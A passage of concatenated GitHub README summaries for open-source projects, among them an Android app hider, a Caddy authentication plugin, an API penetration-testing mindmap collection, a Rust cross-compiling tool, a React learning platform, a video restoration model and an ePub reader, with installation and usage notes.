code reference for the app hider. Icongeek26 & Freepik , for the icons Jetbrains , provides IDE support for open source projects RikkaApps/Shizuku iamr0s/Dhizuku kizitonwose/Calendar ... and all the dedicated contributors ! Disclaimers Amarok is provided without any warranties or conditions. The user is fully responsible for any harm or consequences that may arise from using Amarok.;Hide your private files and apps with a single click.;android,android-application,privacy-protection,hider,file-hider
deltazefiro/Amarok-Hider
greenpau/caddy-security;windows/amd64 linux/amd64 caddy-security Security App and Plugin for Caddy v2 . It includes: Authentication Plugin for implementing Form-Based, Basic, Local, LDAP, OpenID Connect, OAuth 2.0, SAML Authentication Authorization Plugin for HTTP request authorization based on JWT/PASETO tokens Credentials Plugin for managing credentials for various integrations Please show your appreciation for this work and :star: :star: :star: Please consider sponsoring this project via Github Sponsors! Please ask questions either here or via LinkedIn. I am happy to help you! @greenpau Documentation : docs.authcrunch.com Docker Container : authcrunch/authcrunch Configuration Examples : here Security Policy : SECURITY.md;🔐 Authentication, Authorization, and Accounting (AAA) App and Plugin for Caddy v2. 💎 Implements Form-Based, Basic, Local, LDAP, OpenID Connect, OAuth 2.0 (Github, Google, Facebook, Okta, etc.), SAML Authentication. MFA/2FA with App Authenticators and Yubico. 💎 Authorization with JWT/PASETO tokens. 🔐;caddy-plugin,caddy2,security,jwt,authorization,authentication,auth,paseto,paseto-tokens,saml
greenpau/caddy-security
Cyber-Guy1/API-SecurityEmpire;🛡️ API Security Empire Project Credits: Momen Eldawakhly (Cyber Guy) In this repository you will find: Mindmaps, tips & tricks, resources and every thing related to API Security and API Penetration Testing. Our mindmaps and resources are based on OWASP TOP 10 API, our expereince in Penetration testing and other resources to deliver the most advanced and accurate API security and penetration testing resource in the WEB!! 🚪 First gate: {{Recon}} The first gate to enter the API Security Empire is to know how to gather information about the API infrastructure and how to perform a powerfull recon on API to extract the hidden doors which made you compromise the whole infrastructure from, so, we provide this updated API Recon mindmap with the latest tools and methodologies in API recon: PDF Version | XMind Version ⚔️ Weapons you will need: BurpSuite FFUF Arjun Postman SecLists FuzzDB SoapUI GraphQL Voyager Graphinder Kiterunner unfurl 🏋️ Test your abilities and weapons: vapi Generic-University 🚪 Second gate: {{Attacking}} Attacking RESTful & SOAP: PDF Version | XMind Version Attacking GraphQL: Due to the limited attacks in the GraphQL we tried to generate all the possible attacks due to our experience in testing APIs in the coming mindmap: PDF Version | XMind Version While attacking GraphQL, the most important phase is the enumeration of mutations and queries, without which you will not be able to perform full GraphQL testing, to do so, I'm using the Apollo GraphQL Sandbox , Apollo enumerates the queries and mutations, then sorting them in front of you, after that you can chose the action you want to perform using mutations or the data you want to retrive using queries by just chosing them via GUI and Apollo will write down the query automatically. What makes Apollo special is that it's a web based explorer, which means no need to install and you can run it against your local GraphQl too!! Apollo Sandbox 🙏 Special thanks: roottusk Portswigger Tomnomnom assetnote danielmiessler InsiderPhD ffuf OWASP 📝 License:;API Security Project aims to present unique attack & defense methods in API Security field;cybersecurity,penetration-testing,apisecurity,information-security,bugbounty,api,bug-bounty,infosec,cybersec,tips
Cyber-Guy1/API-SecurityEmpire
rust-cross/cargo-zigbuild;cargo-zigbuild 🚀 Help me to become a full-time open-source developer by sponsoring me on GitHub Compile Cargo project with zig as linker for easier cross compiling . Installation bash cargo install cargo-zigbuild You can also install it using pip which will also install ziglang automatically: bash pip install cargo-zigbuild We also provide a Docker image which has macOS SDK pre-installed in addition to cargo-zigbuild and Rust, for example to build for x86_64 macOS: bash docker run --rm -it -v $(pwd):/io -w /io messense/cargo-zigbuild \ cargo zigbuild --release --target x86_64-apple-darwin Usage Install zig following the official documentation , on macOS, Windows and Linux you can also install zig from PyPI via pip3 install ziglang Install Rust target via rustup, for example, rustup target add aarch64-unknown-linux-gnu Run cargo zigbuild , for example, cargo zigbuild --target aarch64-unknown-linux-gnu Specify glibc version cargo zigbuild supports passing glibc version in --target option, for example, to compile for glibc 2.17 with the aarch64-unknown-linux-gnu target: bash cargo zigbuild --target aarch64-unknown-linux-gnu.2.17 [!NOTE] There are various caveats with the glibc version targeting feature: - If you do not provide a --target , Zig is not used and the command effectively runs a regular cargo build . - If you specify an invalid glibc version, cargo zigbuild will not relay the warning emitted from zig cc about the fallback version selected. - This feature does not necessarily match the behaviour of dynamically linking to a specific version of glibc on the build host. - Version 2.32 can be specified, but runs on a host with only 2.31 available when it should instead abort with an error. - Meanwhile specifying 2.33 will correctly be detected as incompatible when run on a host with glibc 2.31. - Certain RUSTFLAGS like -C linker opt-out of using Zig, while -L path/to/files will have Zig ignore -C target-feature=+crt-static . - -C target-feature=+crt-static for statically linking to a glibc version is not supported ( upstream zig cc lacks support ) macOS universal2 target cargo zigbuild supports a special universal2-apple-darwin target for building macOS universal2 binaries/libraries on Rust 1.64.0 and later. bash rustup target add x86_64-apple-darwin rustup target add aarch64-apple-darwin cargo zigbuild --target universal2-apple-darwin Note Note that Cargo --message-format option doesn't work with universal2 target currently. Caveats Currently only Linux, macOS and Windows gnu targets are supported, other target platforms can be added if you can make it work, pull requests are welcome. Only current Rust stable and nightly versions are regularly tested on CI, other versions may not work. Known upstream zig issues : zig cc: parse -target and -mcpu / -march / -mtune flags according to clang : Some Rust targets aren't recognized by zig cc , for example armv7-unknown-linux-gnueabihf , workaround by using -mcpu=generic and explicitly passing target features in #58 ability to link against darwin frameworks (such as CoreFoundation) when cross compiling : Set the SDKROOT environment variable to a macOS SDK path to workaround it zig misses some compiler_rt functions that may lead to undefined symbol error for certain targets. See also: zig compiler-rt status . CPU features are not passed to clang License This work is released under the MIT license. A copy of the license is provided in the LICENSE file.;Compile Cargo project with zig as linker;cargo-subcommand,zig,cross-compile
rust-cross/cargo-zigbuild
reactplay/react-play;ReactPlay(Repo: react-play ) Learn . Create . Share about your ReactJS Development Journey View Demo · Report Bug · Request Feature 👋 Introducing ReactPlay react-play is an open-source web app that helps you learn ReactJS faster with a hands-on practice model. It is a collection of ReactJS projects that you can use to learn ReactJS. Is that all? Nope. You can also create your projects and share them with the world. The best part is that the ReactJS experts will review your project code before it gets part of the ReactPlay app. Isn't that a pure WIN-WIN? 🔥 Demo Here is the link to the app. We hope you enjoy it. The ReactPlay app Link Who doesn't want motivation and support? Many Thanks to all the Stargazers who have supported this project with stars(⭐). You all are amazing!!! Please support the work by giving the repository a ⭐, contributing to it, and/or sponsoring using the Sponsor button at the top 😍. You can also follow us on Twitter @reactplayio . 🏗️ How to Set up ReactPlay for Development? You may want to set up the react-play repo for the following reasons: You want to create a new play (A play is a React project) or want to edit an existing play as a contributor. Please check the Create a Play Guide for more details. Also, please check the Contribution Guide to get started. You want to contribute to the react-play repo in general. Please check the Contribution Guide to get started. Here is a quick overview of the react-play repo setup: 🍴 Fork and Clone the Repo First, you need to fork the react-play repo. You can do this by clicking the Fork button on the top right corner of the repo. If you are new to forking, please watch this YouTube Guide to get started. Once forked, you can clone the repo by clicking the Clone or Download button on the top right corner of the forked repo. Please change the directory after cloning the repository using the cd <folder-name> command. Note: Please do not remove the .env.development file from the root folder. It contains all the environment variables required for development. ⬇️ Install Dependencies Next, install the dependencies by running the following command in the react-play repo. we recommend using yarn but you can install using npm too bash yarn install Or npm install if you don't have yarn installed on your PC, follow the steps below to install it.. Windows 1. open your command prompt as administrator. 2. write corepack enable and hit enter. 3. then npm install --global yarn Linux 1. open terminal and hit npm install --global yarn MacOS 1. open terminal and hit npm install --global yarn or brew install yarn Or Download Package If you are unable to install yarn following the above-mentioned process, then you can simply download the package and install it. Visit the official website of Yarn; there you can just expand the "Alternative" section and it will ask for the version to download for Windows, Linux, or Mac. https://classic.yarnpkg.com/en/docs/install#windows-stable Note : ReactPlay runs on React 18. However, some of our dependencies are yet to upgrade to version 18. So please use the following command when you face difficulties installing the dependencies. Also, ensure to use Node.js version >= 16.x npm install --legacy-peer-deps 🦄 Start the Development Mode Use the following command to start the app in the development mode: bash yarn start or if you installed dependencies using npm use below command npm start Note : The start script automatically invokes "linters" process. Should you need to run the app without lint the use start:nolint instead. However make sure that you run start script at least once before committing your code. Code with linter error may not be reviewed. It runs the app in development mode. Open http://localhost:3000 to view it in your browser. The page will reload when you make changes. You may also see any lint errors in the console. ✨ Format and lint the code Use the following command to format and lint the code: Format the code bash yarn run format OR npm run format Lint the code to check the linting issue bash yarn run lint OR npm run lint to fix the linting issue bash yarn run lint:fix OR npm run lint:fix 🧱 Build the App for Production Use the following command to build the app for production: bash yarn build OR npm build It builds the app for production to the build folder. It correctly bundles React in production mode and optimizes the build for the best performance. The build is minified and the filenames include the hashes. 🧪 Test App Locally (E2E with Playwright) Use the following command to install browser(s) binaries to test locally: bash yarn install playwright OR npm install playwright Use the following command to run Playwright tests: bash yarn e2e OR npm run e2e 👀 Read more about testing in react-play 👀 Read more about playwright: https://playwright.dev/ 🚀 Deploy You can deploy the app to Vercel or Netlify with a single click. 🤝 Contributing to ReactPlay Any kind of positive contribution is welcome! Please help us to grow by contributing to the project. If you wish to contribute, you can, Create a Play Suggest a Feature Test the app, and help it improve. Improve the app, fix bugs, etc. Improve documentation. Create content about ReactPlay and share it with the world. Please read CONTRIBUTING for details on our CODE OF CONDUCT , and the process for submitting pull requests to us. 🆕 New to Open Source? 💡 Follow this guide to jumpstart your Open Source journey 🚀. Launching reactplay Rewards Contributed to reactplay? Here is a big thank you from our community to you. Claim your badge and showcase them with pride. Let us inspire more folks ! Claim Now! 🙏 Support We all need support and motivation. ReactPlay is not an exception. Please give this project a ⭐️ to encourage and show that you liked it. Don't forget to leave a star ⭐️ before you move away. If you found the app helpful, consider supporting us with a coffee. A ⭐️ to ReactPlay is to make us more 💪 stronger and motivated. Contributors ✨ Thanks goes to these wonderful people ( emoji key ): Tapas Adhikary 💻 Nirmal Kumar 💻 Murtuzaali Surti 💻 Abhishek Khatri 💻 Abhishek Holani 💻 Hasnain Makada 💻 Shrilakshmi Shastry 💻 Mohammed Taha 💻 Dalpat Rathore 💻 Eray Alkış 💻 Nirban Chakraborty 💻 Deepak Pundir 💻 Vasanti Suthar 📖 Ahnaf Ahamed 💻 Shivam Katare 💻 Shyam Mahanta 💻 Koustov 💻 Shri Om Trivedi 💻 Naresh Naik 💻 Vincent Patoc 💻 Sachin Chaurasiya 💻 Tejinder Sharma 💻 Ishrar G 💻 Programming-School 💻 Valesh Gopal 💻 Emdadul Haque 💻 Olang Daniel 💻 Supriya M 💻 Saksham chandel 💻 Luca Pizzini 💻 Shivam Bhasin 💻 Tejas Shekar 💻 Anirban Pratihar 💻 Harsh Singh 💻 Franklin U.O. Ohaegbulam 💻 Ammaar Aslam 💻 Mayukh Bhowmick 💻 Emmanuel O Eboh 💻 Shailesh Parmar 💻 dangvu0502 💻 Ceesco 🎨 Hamza Ali 🎨 yash91989201 💻 Makdoom Shaikh 💻 Muzaffar Hossain 💻 Susmita Dey 💻 Sanjay Kumar 💻 Vinay Patil 💻 Abhilash 💻 Kashish Lakhara 💻 hiimnhan 💻 Siddharth Khatri 💻 Emma Dawson 💻 Senali 💻 Nisha Sen 💻 Harshil Jani 💻 Oluka Isaac 💻 NagarjunShroff 💻 Aakash Vishwakarma 💻 Ankit Kumar 💻 Keerthivasan D 💻 Bhavika Tibrewal 💻 Abhi Patel 💻 Aimun Nahar 💻 GodStarLord 💻 Joe Shajan 💻 MohZaid Kapadia 💻 Sam 💻 Trishna Kalita 💻 Wyarej Ali 💻 Zülal Nebin 💻 nrshnaik 💻 Jannik Schmidtke 💻 Md. Saddam Hossain 💻 Janvi Bajoria 💻 Chhakuli Zingare 💻 clevercoderjoy 💻 Priyankar Pal 💻 Akshay Gore 💻 This project follows the all-contributors specification. Contributions of any kind are welcome!;react-play is an opensource platform that helps you learn ReactJS faster with hands-on practice model. It is a collection of projects that you can use to learn ReactJS.;react,reactjs,javascript,react-hooks,open-source,opensource,hacktoberfest
reactplay/react-play
kraanzu/smassh;Smassh 🖮 Smassh is a TUI based typing test application inspired by MonkeyType \ -- A very popular online web-based typing application Smassh tries to be a full fledged typing test experience but not missing out on looks and feel! [!CAUTION] Smassh, by default, uses nerd fonts for the icons If not installed, you'll see random gibberish icons Installation 🔨 Using Pip 🐍 You can install the stable version of smassh by using pip or pipx bash pip install smassh Using AUR 📦 yay -S smassh-bin Executable binary 🔌 You should be able to see binaries for Linux , mac and windows in the releases section [!NOTE] This should automatically create an executable smassh that can be directly run from command line \ If not, check if the local path is added to $PATH Features 🌟 Some features that smassh comes with: An interactive & beautiful UI Words and Time modes for typing Real-time comparison of speed carets Change styles/settings on the fly Mutliple theme support Mutliple language support Lots of options to tweak! Tweaks ⚙️ | Tweak | Description | | --------------- | :--------------------------------------------------------------------------- | | Blind mode | You wouldn't be able to see your mistakes | | Capital Letters | Some letters in your tasks will be capitalized! | | Caret Style | Caret style matters! | | Confidence mode | Are you sure you don't need backspace? Try this :) | | Cursor Buddy | Setup your cursor buddy to run along with you! | | Difficulty | Choose how strict smassh should be with your wrong keypresses | | Force Correct | You wouldn't be able to able to go on without cleaning your pool of mistakes | | Min Accuracy | Fall below this average accuracy and you fail! | | Min Burst | Fall below this average accuracy for even a word and you fail! | | Min Speed | Fall below this average speed and you fail! | | Tab Reset | Hey hey! You wanna reset already? I got ya! | Screenshots 🖼️ Contribution 🤝 See CONTRIBUTING.md for contributions Credits @frizd for the awesome banner \ @miodec for monkeytype! Other TUI projects 🤓 : If you liked smassh then you might wanna try out some of my other TUI projects as well dooit - A todo app that you didn't ask for but needed! gupshup - A localhost TUI chat client;Smassh your Keyboard, TUI Edition;python3,tui,textual,rich,typing,typingspeedtest,typingspeed,terminal-based,monkeytype
kraanzu/smassh
JingyunLiang/VRT;VRT: A Video Restoration Transformer Jingyun Liang , Jiezhang Cao , Yuchen Fan , Kai Zhang , Rakesh Ranjan, Yawei Li , Radu Timofte , Luc Van Gool Computer Vision Lab, ETH Zurich & Meta Inc. arxiv | supplementary | pretrained models | visual results This repository is the official PyTorch implementation of "VRT: A Video Restoration Transformer" ( arxiv , supp , pretrained models , visual results ). VRT achieves state-of-the-art performance in - video SR (REDS, Vimeo90K, Vid4, UDM10)                            :heart_eyes: + 0.33~0.51dB :heart_eyes: - video deblurring (GoPro, DVD, REDS)                                 :heart_eyes: + 1.47~2.15dB :heart_eyes: - video denoising (DAVIS, Set8)                                         :heart_eyes: + 1.56~2.16dB :heart_eyes: - video frame interpolation (Vimeo90K, UCF101, DAVIS)     :heart_eyes: + 0.28~0.45dB :heart_eyes: - space-time video SR (Vimeo90K, Vid4)                                  :heart_eyes: + 0.26~1.03dB :heart_eyes: :rocket: :rocket: :rocket: News : - Oct. 4, 2022 : See the Recurrent Video Restoration Transformer (RVRT, NeurlPS2022) with more balanced model size, testing memory and runtime. - Jun. 15, 2022 : Add results on video frame interpolation and space-time video SR. - Jan. 26, 2022 : See our previous works on | Topic | Title | Badge | |:---:|:------:| :--------------------------: | | transformer-based image restoration | SwinIR: Image Restoration Using Swin Transformer :fire: | | | real-world image SR | Designing a Practical Degradation Model for Deep Blind Image Super-Resolution, ICCV2021 | | | normalizing flow-based image SR and image rescaling | Hierarchical Conditional Flow: A Unified Framework for Image Super-Resolution and Image Rescaling, ICCV2021 | | | blind image SR | Mutual Affine Network for Spatially Variant Kernel Estimation in Blind Image Super-Resolution, ICCV2021 | | | blind image SR | Flow-based Kernel Prior with Application to Blind Super-Resolution, CVPR2021 | | Video restoration (e.g., video super-resolution) aims to restore high-quality frames from low-quality frames. Different from single image restoration, video restoration generally requires to utilize temporal information from multiple adjacent but usually misaligned video frames. Existing deep methods generally tackle with this by exploiting a sliding window strategy or a recurrent architecture, which either is restricted by frame-by-frame restoration or lacks long-range modelling ability. In this paper, we propose a Video Restoration Transformer (VRT) with parallel frame prediction and long-range temporal dependency modelling abilities. More specifically, VRT is composed of multiple scales, each of which consists of two kinds of modules: temporal mutual self attention (TMSA) and parallel warping. TMSA divides the video into small clips, on which mutual attention is applied for joint motion estimation, feature alignment and feature fusion, while self-attention is used for feature extraction. To enable cross-clip interactions, the video sequence is shifted for every other layer. Besides, parallel warping is used to further fuse information from neighboring frames by parallel feature warping. Experimental results on three tasks, including video super-resolution, video deblurring and video denoising, demonstrate that VRT outperforms the state-of-the-art methods by large margins (up to 2.16 dB) on nine benchmark datasets. Contents Requirements Quick Testing Training Results Citation License and Acknowledgement Requirements Python 3.8, PyTorch >= 1.9.1 Requirements: see requirements.txt Platforms: Ubuntu 18.04, cuda-11.1 Quick Testing Following commands will download pretrained models and test datasets automatically (except Vimeo-90K testing set). If out-of-memory, try to reduce --tile at the expense of slightly decreased performance. You can also try to test it on Colab , but the results may be slightly different due to --tile difference. ```bash download code git clone https://github.com/JingyunLiang/VRT cd VRT pip install -r requirements.txt 001, video sr trained on REDS (6 frames), tested on REDS4 python main_test_vrt.py --task 001_VRT_videosr_bi_REDS_6frames --folder_lq testsets/REDS4/sharp_bicubic --folder_gt testsets/REDS4/GT --tile 40 128 128 --tile_overlap 2 20 20 002, video sr trained on REDS (16 frames), tested on REDS4 python main_test_vrt.py --task 002_VRT_videosr_bi_REDS_16frames --folder_lq testsets/REDS4/sharp_bicubic --folder_gt testsets/REDS4/GT --tile 40 128 128 --tile_overlap 2 20 20 003, video sr trained on Vimeo (bicubic), tested on Vid4 and Vimeo python main_test_vrt.py --task 003_VRT_videosr_bi_Vimeo_7frames --folder_lq testsets/Vid4/BIx4 --folder_gt testsets/Vid4/GT --tile 32 128 128 --tile_overlap 2 20 20 python main_test_vrt.py --task 003_VRT_videosr_bi_Vimeo_7frames --folder_lq testsets/vimeo90k/vimeo_septuplet_matlabLRx4/sequences --folder_gt testsets/vimeo90k/vimeo_septuplet/sequences --tile 8 0 0 --tile_overlap 0 20 20 004, video sr trained on Vimeo (blur-downsampling), tested on Vid4, UDM10 and Vimeo python main_test_vrt.py --task 004_VRT_videosr_bd_Vimeo_7frames --folder_lq testsets/Vid4/BDx4 --folder_gt testsets/Vid4/GT --tile 32 128 128 --tile_overlap 2 20 20 python main_test_vrt.py --task 004_VRT_videosr_bd_Vimeo_7frames --folder_lq testsets/UDM10/BDx4 --folder_gt testsets/UDM10/GT --tile 32 128 128 --tile_overlap 2 20 20 python main_test_vrt.py --task 004_VRT_videosr_bd_Vimeo_7frames --folder_lq testsets/vimeo90k/vimeo_septuplet_BDLRx4/sequences --folder_gt testsets/vimeo90k/vimeo_septuplet/sequences --tile 8 0 0 --tile_overlap 0 20 20 005, video deblurring trained and tested on DVD python main_test_vrt.py --task 005_VRT_videodeblurring_DVD --folder_lq testsets/DVD10/test_GT_blurred --folder_gt testsets/DVD10/test_GT --tile 12 256 256 --tile_overlap 2 20 20 006, video deblurring trained and tested on GoPro python main_test_vrt.py --task 006_VRT_videodeblurring_GoPro --folder_lq testsets/GoPro11/test_GT_blurred --folder_gt testsets/GoPro11/test_GT --tile 18 192 192 --tile_overlap 2 20 20 007, video deblurring trained on REDS, tested on REDS4 python main_test_vrt.py --task 007_VRT_videodeblurring_REDS --folder_lq testsets/REDS4/blur --folder_gt testsets/REDS4/GT --tile 12 256 256 --tile_overlap 2 20 20 008, video denoising trained on DAVIS (noise level 0-50), tested on Set8 and DAVIS python main_test_vrt.py --task 008_VRT_videodenoising_DAVIS --sigma 10 --folder_lq testsets/Set8 --folder_gt testsets/Set8 --tile 12 256 256 --tile_overlap 2 20 20 python main_test_vrt.py --task 008_VRT_videodenoising_DAVIS --sigma 10 --folder_lq testsets/DAVIS-test --folder_gt testsets/DAVIS-test --tile 12 256 256 --tile_overlap 2 20 20 009, video frame interpolation trained on Vimeo (single frame interpolation), tested on Viemo, UCF101 and DAVIS-train python main_test_vrt.py --task 009_VRT_videofi_Vimeo_4frames --folder_lq testsets/vimeo90k/vimeo_septuplet/sequences --folder_gt testsets/vimeo90k/vimeo_septuplet/sequences --tile 0 0 0 --tile_overlap 0 0 0 python main_test_vrt.py --task 009_VRT_videofi_Vimeo_4frames --folder_lq testsets/UCF101 --folder_gt testsets/UCF101 --tile 0 0 0 --tile_overlap 0 0 0 python main_test_vrt.py --task 009_VRT_videofi_Vimeo_4frames --folder_lq testsets/DAVIS-train --folder_gt testsets/DAVIS-train --tile 0 256 256 --tile_overlap 0 20 20 010, space-time video sr, using pretrained models from 003 and 009, tested on Vid4 and Viemo Please refer to 003 and 009 test on your own datasets (an example) python main_test_vrt.py --task 001_VRT_videosr_bi_REDS_6frames --folder_lq testsets/your/own --tile 40 128 128 --tile_overlap 2 20 20 ``` All visual results of VRT can be downloaded here . Training The training and testing sets are as follows (see the supplementary for a detailed introduction of all datasets). For better I/O speed, use create_lmdb.py to convert .png datasets to .lmdb datasets. Note: You do NOT need to prepare the datasets if you just want to test the model. main_test_vrt.py will download the testing set automaticaly. | Task | Training Set | Testing Set | Pretrained Model and Visual Results of VRT | |:-------------------------------------------------------|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------:|:--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------:| :---: | | video SR (setting 1, BI) | REDS sharp & sharp_bicubic (266 videos, 266000 frames: train + val except REDS4) Use regroup_reds_dataset.py to regroup and rename REDS val set | REDS4 (4 videos, 400 frames: 000, 011, 015, 020 of REDS) | here | | video SR (setting 2 & 3, BI & BD) | Vimeo90K (64612 seven-frame videos as in sep_trainlist.txt ) * Use generate_LR_Vimeo90K.m and generate_LR_Vimeo90K_BD.m to generate LR frames for bicubic and blur-downsampling VSR, respectively. | Vimeo90K-T (the rest 7824 7-frame videos) + Vid4 (4 videos) + UDM10 (10 videos) Use prepare_UDM10.py to regroup and rename the UDM10 dataset | here | | video deblurring (setting 1, motion blur) | DVD (61 videos, 5708 frames) Use prepare_DVD.py to regroup and rename the dataset. | DVD (10 videos, 1000 frames) Use evaluate_video_deblurring.m for final evaluation. | here | | video deblurring (setting 2, motion blur) | GoPro (22 videos, 2103 frames) Use prepare_GoPro_as_video.py to regroup and rename the dataset. | GoPro (11 videos, 1111 frames) Use evaluate_video_deblurring.m for final evaluation. | here | | video deblurring (setting 3, motion blur) | REDS sharp & blur (266 videos, 266000 frames: train & val except REDS4) Use regroup_reds_dataset.py to regroup and rename REDS val set. Note that it shares the same HQ frames as in VSR. | REDS4 (4 videos, 400 frames: 000, 011, 015, 020 of REDS) | here | | video denoising (Gaussian noise) | DAVIS-2017 (90 videos, 6208 frames) Use all files in DAVIS/JPEGImages/480p | DAVIS-2017-test (30 videos) + Set8 (8 videos: tractor, touchdown, park_joy and sunflower selected from DERF + hypersmooth, motorbike, rafting and snowboard from GOPRO_540P) | here | | video frame interpolation (single-frame interpolation) | Vimeo90K (64612 seven-frame videos as in sep_trainlist.txt ) | Vimeo90K-T (the rest 7824 7-frame videos) + UCF101 (100 videos, 100 quintuples) + DAVIS-2017 (90 videos, 6208 frames, 2849 quintuples) For DAVIS-2017, use all files in DAVIS/JPEGImages/480p | here | | space-time video SR | Not trained. Using pretrianed models 003 and 009. | Vimeo90K-T (the rest 7824 7-frame videos) + Vid4 (4 videos) Using fast/medium/slow splits in data/meta_info. | here | The training code is at KAIR . Results We achieved state-of-the-art performance on video SR, video deblurring and video denoising. Detailed results can be found in the paper . Video Super-Resolution Video Deblurring Video Denoising Video Frame Interpolation Space-Time Video Super-Resolution Citation @article{liang2022vrt, title={VRT: A Video Restoration Transformer}, author={Liang, Jingyun and Cao, Jiezhang and Fan, Yuchen and Zhang, Kai and Ranjan, Rakesh and Li, Yawei and Timofte, Radu and Van Gool, Luc}, journal={arXiv preprint arXiv:2201.12288}, year={2022} } License and Acknowledgement This project is released under the CC-BY-NC license. We refer to codes from KAIR , BasicSR , Video Swin Transformer and mmediting . Thanks for their awesome works. The majority of VRT is licensed under CC-BY-NC, however portions of the project are available under separate license terms: KAIR is licensed under the MIT License, BasicSR, Video Swin Transformer and mmediting are licensed under the Apache 2.0 license.;VRT: A Video Restoration Transformer (official repository);transformer,video-restoration,low-level-vision,vision-transformer,video-super-resolution,video-deblurring,video-denoising,video-sr,super-resolution,sr
JingyunLiang/VRT
pacexy/flow;Flow - Open Source Software (OSS) Redefine ePub reader Free. Open source. Browser-based. Features Grid layout Search in book Image preview Custom typography Highlight and Annotation Theme Share/Download book with link Data export Cloud storage For planed features, see our roadmap . Development Prerequisites Node.js pnpm Git Clone the repo bash git clone https://github.com/pacexy/flow Install the dependencies bash pnpm i Setup the environment variables Copy and rename all .env.local.example s to .env.local and setup the environment variables. Run the apps bash pnpm dev Self-hosting Before self-hosting, you should setup the environment variables . Docker You can use docker-compose: sh docker compose up -d Or build the image and run it manually: sh docker build -t flow . docker run -p 3000:3000 --env-file apps/reader/.env.local flow Contributing There are many ways in which you can participate in this project, for example: Submit bugs and feature requests , and help us verify as they are checked in Submit pull requests Credits Epub.js React Next.js TypeScript Vercel Turborepo;Browser-based ePub Reader.;epub-reader,nextjs,react,reactjs,typescript,epub,reader,pwa
pacexy/flow
ErickWendel/semana-javascript-expert06;Spotify Radio - JS Expert Week 6.0 Welcome to the sixth Javascript Expert Week. This is the starting code to start our journey. Tag this project with a star 🌟 Preview Checklist Features Web API [ ] Must achieve 100% code coverage in tests [ ] Must have end to end tests validating all API routes [ ] Must deliver static files as Node.js Streams [ ] Must deliver music files as a Node.js Stream [ ] Given a disconnected user it should not break the API [ ] Even if multiple commands are fired at the same time, it should not break the API [ ] If an unexpected error occurs, the API should keep working [ ] The project needs to run on Linux, Mac and Windows environments Web App Client [ ] Must play the broadcast [ ] Shouldn't pause if any effects are added Controller [ ] Must achieve 100% code coverage in tests [ ] Must be able to start or stop a broadcast [ ] Must send commands to add audio effects to a stream Tasks per class Lesson 01: Cover service and route layers with unit tests and achieve 100% code coverage Lesson 02: Maintain 100% code coverage and implement e2e tests for the entire API Lesson 03: implement unit tests for the frontend and maintain 100% code coverage PLUS : [ ] provide a new effect [ ] add a new button on the controller [ ] add a new effect sound to the audios/fx/ folder [ ] repost on heroku Source code for classes and solving challenges Class01 desafio-resolvido and page with 100% code coverage Class02 desafio-resolvido and page with 100% code coverage Class03 desafio-resolvido and page with 100% code coverage Credits to the sources I've used on the demos Streaming English Conversation Effects Applause Applause Audience Boo Fart Laugh FAQ NODE_OPTIONS is not a system recognized command, what to do? If you are on Windows, the way to create environment variables is different. You must use the word set before the command. Ex: "test": "set NODE_OPTIONS=--experimental-vm-modules && npx jest --runInBand", I ran npm test but nothing happens, what to do? Check your Node.js version. We are using version 17. Go to node.js website and download the latest version. jest.spyOn - when we try to use function.name (something like stream.pipe.name ), it says the instance is undefined In this case, use the value as a string: jest.spyOn(stream, "pipe").mockReturnValue Challenge 01 impossible to complete 100% code coverage because testUtil.js is not being fully used Add the following code snippet to the first line of the testUtil.js file: /* istanbul ignore file */ . This will make jest ignore this file and complete 100%. Important: this change will only serve to complete this first and/or second challenge, in the last class, we will not need to ignore this file since we will use all the functions;JS Expert Week 6.0 Classes - Spotify Radio;nodejs,streams,audio,sox,spotify,javascript,jest,tests,e2e,unit
ErickWendel/semana-javascript-expert06
riccardoperra/codeimage;Create elegant code screenshots of your source code. Introduction CodeImage is the newest tool to help developers to create beautiful screenshots of their code, providing several features to speed up the process to post in social media. 🤖 Tech stack CodeImage architecture consist of a PNPM monorepo, currently subdivided in packages and apps . Apps @codeimage/app The front-end application, entirely built with SolidJS. It currently also relies on these libraries: vanilla-extract : Zero-runtime Stylesheets-in-TypeScript. CodeMirror6 : Extensible code editor StateBuilder : Composable state management @codeui/kit : Accessible UI Kit based on Kobalte solid-primitives : SolidJS primitives library @codeimage/api The REST API layer built with Fastify , Prisma ORM and Auth0 . Packages @codeimage/ui : contains the source code of the UI kit of CodeImage front-end application. Note the UI kit is being moved to @codeui/kit repository @codeimage/config : contains the base configurations and interfaces for CodeImage @codeimage/highlight : contains the custom editor and highlighting themes for CodeMirror @codeimage/dom-export : contains the html-to-image fork which includes several fix for image export @codeimage/locale : contains a wrapper of @solid-primitives/i18n which includes strict typing for i18n @codeimage/vanilla-extract : contain the Vanilla Extract plugin fork which includes SolidJS and PNPM fixes to work under monorepo. @codeimage/prisma-models : contains the Prisma ORM backend models shared across front-end and back-end application. @codeimage/atomic-state : contain the source code of a small state manager which includes some utilities helper for RxJS and solid-js/store 🌏 Contributions Warning Read this before opening any PR! When contributing, it's better to first discuss the change you wish to make via issue or discussion, or any other method with the owners of this repository before making a change. See the CONTRIBUTING.md guide for more details. CodeImage is the winner of SolidHack 2022 for the Best Application category! License MIT © Riccardo Perra;A tool to beautify your code screenshots. Built with SolidJS and Fastify.;solid-js,solid,code,editor,screenshot,snippets,tweet,sharing,codesnippets,beautiful
riccardoperra/codeimage
tnballo/high-assurance-rust;High Assurance Rust Click here to read now: https://highassurance.rs/ What does this book aim to do? Provide an accessible but principled introduction to developing secure and robust systems. At the overlap of "state-of-the-art" and "near-term practical": mostly production-grade tools and techniques, but also some cutting-edge research projects. All open-source. Help experienced developers both learn a new language and delve deeper into fundamental Computer Science and Computer Architecture topics. How can I help? If you find this content valuable, consider increasing its visibility among developers by starring this GitHub repo. Much appreciated! :) To cite this book directly in your own work, please use this BibTeX or similar: @misc{high_assurance_rust, title={High Assurance Rust: Developing Secure and Robust Software}, url={https://highassurance.rs}, howpublished = "\url{https://highassurance.rs}", author={Ballo, Tiemoko and Ballo, Moumine and James, Alex}, year={2022} } Interested in a physical print? Please sign up here if you'd like to be notified when the book is finished and hard copies are available. The email you provide not be shared or used for any other purpose. Have feedback or questions? Your input matters. We'd love to hear from you, please send an email to: contact@highassurance.rs Can I contribute? Contributions are welcome and appreciated. Please see CONTRIBUTING.md . Anything else I should know? A great deal of effort went into making this book a reality. We hope you have as much fun reading as we did writing. Let's hack together!;A free book about developing secure and robust systems 